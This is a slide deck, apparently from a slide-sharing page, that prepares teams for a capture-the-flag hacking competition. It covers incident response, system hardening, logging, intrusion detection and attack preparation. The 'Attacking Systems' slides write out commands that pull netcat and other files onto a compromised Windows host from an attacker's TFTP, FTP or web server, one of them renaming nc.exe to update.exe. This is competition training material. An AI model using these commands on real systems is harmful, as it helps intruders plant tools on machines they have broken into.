Getting ready for a Capture The Flag Hacking Competition

Strategic Security, Inc. © http://www.strategicsec.com/
Preparing For The
Strategic Security CTF
Presented By:
Joe McCray
joe@strategicsec.com
http://www.linkedin.com/in/joemccray
http://twitter.com/j0emccray

Generic CTF Prep
CTF Overview
• What Is A CTF?
• Generic CTF Prep
• Strategic Security Specific CTF Prep
• Incident Response
• System Hardening
• System Logging
• Intrusion Detection System
• Attacking Systems
• Maintaining Access

What is A CTF?

What Is A CTF?
According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag
In computer security, Capture the Flag (CTF) is a computer security competition.
CTF contests are usually designed to serve as an educational exercise to
give participants experience in securing a machine, as well as conducting and
reacting to the sort of attacks found in the real world.
Reverse-engineering, network sniffing, protocol analysis, system administration,
programming, and cryptanalysis are all skills which have been required by prior
CTF contests at DEF CON.
There are two main styles of capture the flag competitions: attack/defense
and jeopardy.

What Is A CTF?…(cont.)
Jeopardy style competitions usually involve multiple categories of problems, each
of which contains a variety of questions of different point values.
Teams race to be the first to solve the most number of points, but do not directly
attack each other.

In an attack/defense style competition, each team is given a machine (or a small
network) to defend on an isolated network.
Teams are scored on both their success in defending their assigned machine and
on their success in attacking other team's machines.
Image from:
http://ctf.itsec.rwth-aachen.de/vpn/

Depending on the nature of the particular CTF game, teams may either be
attempting to take an opponent's flag from their machine or teams may be
attempting to plant their own flag on their opponent's machine.
Image from:
http://ctf.itsec.rwth-aachen.de/vpn/

Generic CTF Prep

Generic CTF Prep
Jeopardy Style CTF Prep
Similar to preparing for the TV Show Jeopardy: http://ken-jennings.com/faq
• Really hard to cram for so hit the common trivia stuff
• Hacker history
• High profile attacks/vulnerabilities
• Hacker movies
• Skip the protocol/programming stuff – either you know it or you don’t
Network Attack/Defense Prep
• Download all patches for common OSs, or build your own repos
• Organize your incident response tools
• Have trusted binaries for most common Oss
• Organize your exploitation/post-exploitation tools/scripts

Strategic Security CTF Prep

Step 1: Start with the basics
• Verify that the place you will be playing from has fast/stable internet
• Verify that the network that you will be playing from is secure/safe
• Create a separate subnet for yourself (cheap router)
• Turn off or firewall all of the other computers in your subnet
• Make sure no one else is using your subnet during the game
• Verify that the attack workstation/Virtual Machine you will be using has at
least 2GB of RAM
• Verify that the defensive server has at least 4GB of RAM
• Download/Install the latest version of VMWare Workstation or Player

Step 2: Get Your Team Organized
• Set up a means for your team to interactively communicate in real time
• Google Hangout, Skype, IRC, etc
• Set up a means for your team to share resources (docs, tools, etc)
• Google Hangout, Google Docs, Sharepoint, Wiki
• Understand that some teammates may be in different timezones
• Break your team up by function(s)
• Attackers
• Defenders
• Systems Administrators
• Researchers

Step 2: Get Your Team Organized (Cont.)
• Players that do not have a team will be placed on teams by Thursday 5 Dec.
• Get your new teammates integrated quickly
• Job role(s)
• Access to team resources
• Get everyone’s tools, scripts together and try to get them documented so
team members can know how to use them and more importantly what they
look like to your defensive mechanisms

Incident Response

Incident Response
Step 3: Prepare For Incident Response
• The first critical skill required of this game will be incident response
• Your system will be backdoored
• Your system will be rootkited
• Your system will be loaded with vulnerabilities
• Everything from weak passwords, to custom buffer overflows
Required Incident Response Skills
• Your team will have to be able to quickly find and remove backdoors
• Your team will have to be able to quickly find and remove rootkits

Incident Response
The Methodology (Step 1: List all running processes)
• GUI Tools
• Task Manager
• Process Explorer:
• http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
• Command-line Tools
• Tasklist Command:
• http://technet.microsoft.com/en-us/library/bb491010.aspx
• PsList:

Incident Response
The Methodology (Step 2: Identify malicious processes)
• Look up every process that is running to see if it is legitimate
• Resources:
• http://www.fileresearchcenter.com/
• http://www.neuber.com/taskmanager/process/index.html
• http://www.liutilities.com/products/wintaskspro/processlibrary/
• Of course Google!

Incident Response
The Methodology (Step 3: Kill all malicious processes)
• GUI Tools
• Task Manager
• Process Explorer:
• Command-line Tools
• Taskkill Command:
• http://technet.microsoft.com/en-us/library/bb491009.aspx
• PsKill

Incident Response
The Methodology (Step 4: Find All Malicious Connections)
• TCPView (GUI Tool):
• Netstat Command:
• http://windowsitpro.com/windows/using-netstat-get-list-open-ports
• https://isc.sans.edu/forums/diary/Fun+With+Windows+Netstat/1911
• http://computer-networking.wonderhowto.com/how-to/detect-hackers-with-netstat-262222/
• http://www.dti.ulaval.ca/webdav/site/sit/shared/Librairie/di/operations/informatique/windows/netstat_results.htm
• During the game – take note of your teammates’ IP addresses
• If there is an IP that doesn’t belong to your teammates connected to your
server – that is probably an attacker from another team and you should kill
that connection

Incident Response
The Methodology (Step 5: Kill All Malicious Connections)
• TCPView (GUI Tool):
• Taskkill Command
• wKillcx
• http://wkillcx.sourceforge.net/

Incident Response
The Methodology (Step 6: Find Malicious Services)
• References:
• http://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-
service/
• http://www.addictivetips.com/windows-tips/smartly-analyze-windows-
local-services-for-malware-rootkits-more/
• http://reverseengineering.stackexchange.com/questions/2019/debuggin
g-malware-that-will-only-run-as-a-service

Incident Response
The Methodology (Step 7: Find Rootkits)
• References:
• http://www.computerweekly.com/feature/Rootkit-and-malware-
detection-and-removal-guide

Incident Response Resources
Good Technical Incident Response Resources
• References:
• http://www.slideshare.net/pmelson/malware-analysis-made-simple-presentation
• http://computer-forensics.sans.org/summit-archives/DFIR_Summit/Finding-Malware-Like-Iron-Man-Corey-Harrell.pdf

What Are We Covering Today
Today We Will Be Covering
• What Is A CTF?
• Generic CTF Prep
• Strategic Security Specific CTF Prep
• Incident Response
• System Hardening
• System Logging
• Intrusion Detection Systems
• Attacking Systems
• Maintaining Access

System Hardening

System Hardening
The Methodology (Step 1: Create Hardening Checklists)
• STIG
• http://iase.disa.mil/stigs/
• Hardening Guides
• http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml
• https://secure.ericade.net/security/index.php/Windows_Hardening_Guide
• https://benchmarks.cisecurity.org/downloads/benchmarks/
• Generic Hardening Resources
• http://www.xmarks.com/topic/server_hardening

System Hardening
The Methodology (Step 2: Organize Your Tools and Scripts)
• MBSA
• http://www.microsoft.com/en-us/download/details.aspx?id=7558
• Benchmark Assessment Tools
• http://benchmarks.cisecurity.org/downloads/audit-tools/

System Hardening
The Methodology (Step 3: Focus on Scripting)
• Scripting For Security
• http://www.sans.org/reading-room/whitepapers/scripting
• http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html
• http://technet.microsoft.com/en-us/scriptcenter/dd742377.aspx
• http://www.sans.org/reading-room/whitepapers/auditing/simple-windows-batch-scripting-intrusion-discovery-33193
• Interesting Book I Came Across Today
• http://www.amazon.com/Perl-Scripting-Windows-Security-Monitoring/dp/159749173X
• Haven’t read it
• Don’t know the author
• But looks interesting and may help with this game

System Hardening
The Methodology (Step 4: Focus on Continuous Monitoring)
• Be conscious of the potential skill of the attackers
• Consider yourself breached at all times during the game
IMPORTANT
• Throughout the game be sure to constantly verify that your security
configurations have not changed

System Hardening
The Methodology (Step 1: Create Hardening Checklists)
• Stigs
• http://iase.disa.mil/stigs/
• Hardening Guides
• http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml
• https://secure.ericade.net/security/index.php/Windows_Hardening_Guide
• https://benchmarks.cisecurity.org/downloads/benchmarks/
• Generic Hardening Resources
• http://www.xmarks.com/topic/server_hardening
• Blah

System Logging

System Logging
The Methodology (Step 1: Understand Windows Logging)
• Windows Logging Basics
• http://www.windowsecurity.com/articles-
tutorials/windows_os_security/Understanding_Windows_Logging.html
• http://www.sans.org/security-resources/idfaq/logging-windows.php
• http://en.wikipedia.org/wiki/Event_Viewer
• Event ID Listings
• http://www.eventid.net/
• http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx

System Logging
The Methodology (Step 2: Organize Log Analysis Tools)
• Free Tools
• http://www.microsoft.com/en-us/download/details.aspx?id=24659
• http://www.lizard-labs.net/log_parser_lizard.aspx
• http://visuallogparser.codeplex.com/
• Learn To Use Log Parser and Log Parser Lizard
• http://computer-forensics.sans.org/blog/2011/02/10/computer-forensics-howto-microsoft-log-parser
• Take it to the next level with Splunk
• https://www.sans.org/reading-room/whitepapers/logging/setting-splunk-
event-correlation-home-lab-34422

System Logging
The Methodology (Step 3: Organize Important Queries)
• Good queries to run:
• http://aggressivevirusdefense.wordpress.com/2010/04/23/log-parser/
• http://www.codinghorror.com/blog/2005/08/microsoft-logparser.html

System Logging
The Methodology (Step 4: Set Up Automated Tasks)
• Windows Automation Basics
• http://www.techradar.com/us/news/software/applications/how-to-
automate-tasks-in-windows-1107254
• http://www.iopus.com/guides/winscheduler.htm
• http://stackoverflow.com/questions/6933698/automate-services-restart-
in-windows-server-2003

Intrusion Detection Systems

The Methodology (Step 1: Start With The Basics)
• Do you have the resources to run an IDS?
• VMWare Workstation or ESXi (recommended)
• At least 2GB of RAM to allocate to the IDS
• Run on the same host machine as your team server (eases network
configuration issues)
• Are you willing to build it/debug it now?
• Probably want a full day or 2 to just to play around with it if this is your
first time
• Run attacks with metasploit and get a feel of what alerts look like and
how fast they come in

The Methodology (Step 2: Decide What To Deploy)
• Lots of IDSs to choose from
• Network Based
• Snort http://snort.org/
• Suricata
http://www.openinfosecfoundation.org/index.php/download-suricata
• Bro http://www.bro.org/
• Host-Based
• OSSEC http://www.ossec.net/

The Methodology (Step 2: Decide What To Deploy - Cont)
• Network based IDS are good, but are highly prone to false positives
• Host-Based IDS are great, but require something running on the host
• The best option is to combine the two IDS types, but that can be a lot of work
• The problem with deploying both of them is that it can be a lot of work

The Methodology (Step 3: Deploy with bang for buck in mind)
• Use something that gives you the most bang for your buck (tools/features)
• Use something that you can build quickly
• My Recommendations:
• Security Onion: http://blog.securityonion.net/p/securityonion.html
• OSSIM: http://www.alienvault.com/open-threat-exchange/projects

Attacking Systems

Attacking Systems
The Methodology (Step 1: Attack Yourself First)
• Don’t tip your hat to other teams by researching on their servers
• Create a copy (clone) of your team server
• This will allow attackers to develop working attacks for the server
• Run all security tools (Nessus/Metasploit) against your clone server
• http://www.slideshare.net/dc612/dc612-hands-on-penetration-testing-101-presentation-final
• http://www.slideshare.net/kozmaa/the-best-defense-is-a-good-offense-april-2013
• Create a list of attacks that work against your server

Attacking Systems
The Methodology (Step 2: Create Click Scripts)
• Organize your attacks into click scripts
• Shell Scripts
• Batch Scripts
• MSF CLI Scripts
• Have a war chest of mad kung fu

Attacking Systems
The Methodology (Step 2: Create Click Scripts…cont.)
• Start with shell scripts
• Tutorials:
• http://www.danscourses.com/Network-Penetration-Testing/bash-line-commands-a-shell-scripting.html
• http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/
• http://www.commonexploits.com/lazymap-lazy-nmap-scanning-script/
• Videos:
• http://www.youtube.com/watch?v=GPjcSxyIIUc

Attacking Systems
• Pentester Shell Script Resources
• https://github.com/leebaird/discover
• http://www.pentesterscripting.com/
• http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html
• https://www.sans.org/reading-room/whitepapers/auditing/admins-documentation-hackers-pentest-33303

Attacking Systems
• Pentester Windows Scripting Resources
• http://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf
• http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html
• https://chapters.theiia.org/lansing/Documents/Command%20Line%20Basics%20for%20IT%20Auditors.pdf
• https://isc.sans.edu/diary/Windows+Command-Line+Kung+Fu+with+WMIC/1229
• http://www.sans.org/reading-room/whitepapers/scripting/windows-script-host-hack-windows-33583
• http://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf

Attacking Systems
• Step Up To MSFCLI
• http://www.offensive-security.com/metasploit-unleashed/Msfcli
• http://www.youtube.com/watch?v=Jt6ynMun8Tk

Attacking Systems
The Methodology (Step 3: Have a War Chest Close By)
• I think I’ve got a script for that….
• https://www.sans.org/reading-room/whitepapers/auditing/admins-documentation-hackers-pentest-33303
• http://www.rmccurdy.com/scripts/fu.txt

Attacking Systems
The Methodology (Step 4: Have lots of ways to download files)
• There is no more critical offensive skill
• Native
• TFTP
• FTP
• VBS Script
• In-line file transfer (debug.exe)
• Bitsadmin
• Powershell
• Tools
• Netcat Clones
• Meterpreter Upload

Attacking Systems
The Methodology (Step 4: Have lots of ways to download files…cont.)
• TFTP
• Make sure your attacker machine is running a TFTP Server
• On compromised host command prompt type:
• tftp -i TFTP-Server-IP GET nc.exe c:nc.exe

Attacking Systems
• FTP
• Make sure your attacker machine is running an FTP Server
• Remember a hacked command prompt can not run interactive commands.
• You will need to run an ftp script to pull this off:
• On compromised host command prompt type:
• echo user strategicsec strategicsec > c:ftp.txt
• echo bin >> c:ftp.txt
• echo get nc.exe update.exe >> c:ftp.txt
• echo quit >> c:ftp.txt
• ftp -n -s:c:ftp.txt FTP-Server-IP
• del c:ftp.txt

Attacking Systems
• VBS Script
• Make sure your attacker machine is running a web Server
• http://www.wsec.be/blog/2009/07/20/pure-vbs-downloader-with-proxy-support
• On compromised host command prompt echo in every line of the vbs file:
• echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs
• echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs
• .
• .
• echo Next >> vbs_download.vbs
• echo ts.Close >> vbs_download.vbs
• cscript vbs_download.vbs http://WebServer-IP/file.txt file.txt

Attacking Systems
• In-Line File Transfer (debug.exe method)
• Make sure your attacker machine is running a web Server
• http://ow.ly/rE9UH
• http://rhysmossom.com/2013/07/01/mssql-fileupload-autohack/
• http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf
• On compromised host command paste in hex opcode.

Attacking Systems
• Win7 and higher tricks (other stuff may be disabled)
• http://www.greyhathacker.net/?tag=download-and-execute
• The link covers the following methods
• Vbs
• wsh
• Bitsadmin
• Powershell

Contact Me....
Toll Free: 1-844-458-1008
Email: joe@strategicsec.com
Twitter: http://twitter.com/j0emccray
LinkedIn: http://www.linkedin.com/in/joemccray

Getting ready for a Capture The Flag Hacking Competition

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Getting ready for a Capture The Flag Hacking Competition

Similar to Getting ready for a Capture The Flag Hacking Competition (20)

Recently uploaded

Recently uploaded (20)

Getting ready for a Capture The Flag Hacking Competition